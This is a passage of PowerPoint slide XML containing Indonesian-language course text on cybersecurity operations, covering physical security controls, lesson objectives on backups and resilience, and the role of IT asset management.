            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fisik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melindungi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>personel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keras</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tindakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kejadian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fisik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyebabkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerusakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>parah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerugian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bagi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Ini </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>termasuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lencana</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> CCTV, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> sensor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>deteksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyusupan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fisik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aspek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>siber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelanggaran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fisik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyebabkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>langsung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan data, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melewati</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>langkah-langkah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>siber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lainnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Bersama-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konsep-konsep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendukung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>operasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>siber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membantu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melindungi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>masalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kelangsungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>operasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menghadapi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peristiwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengganggu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Tujuan Pelajaran</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Dalam </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelajaran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, Anda </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berikut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Meninjau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konsep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pencadangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Memahami</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>praktik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Menjelajahi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> strategi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketersediaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketahanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tinggi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Meninjau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konsep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fisik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</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151</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="429327333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Manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komponen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>operasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>siber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>efektif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Hal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melibatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>identifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>klasifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>inventarisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> TI </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>termasuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keras</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, data, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>personel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>efektif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memahami</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>infrastruktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> TI </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memantau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aktivitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
